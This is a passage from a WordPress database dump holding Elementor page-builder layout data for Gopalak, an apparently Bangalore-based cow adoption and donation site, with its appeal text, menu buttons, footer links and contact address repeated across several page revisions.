Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12308,2018,'_elementor_page_assets','a:0:{}'),(12310,2019,'_elementor_edit_mode','builder'),(12311,2019,'_elementor_template_type','wp-page'),(12312,2019,'_elementor_version','3.7.8'),(12313,2019,'_wp_page_template','elementor_canvas'),(12314,2019,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12315,2019,'_elementor_page_assets','a:0:{}'),(12318,2020,'_elementor_edit_mode','builder'),(12319,2020,'_elementor_template_type','wp-page'),(12320,2020,'_elementor_version','3.7.8'),(12321,2020,'_wp_page_template','elementor_canvas'),(12322,2020,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 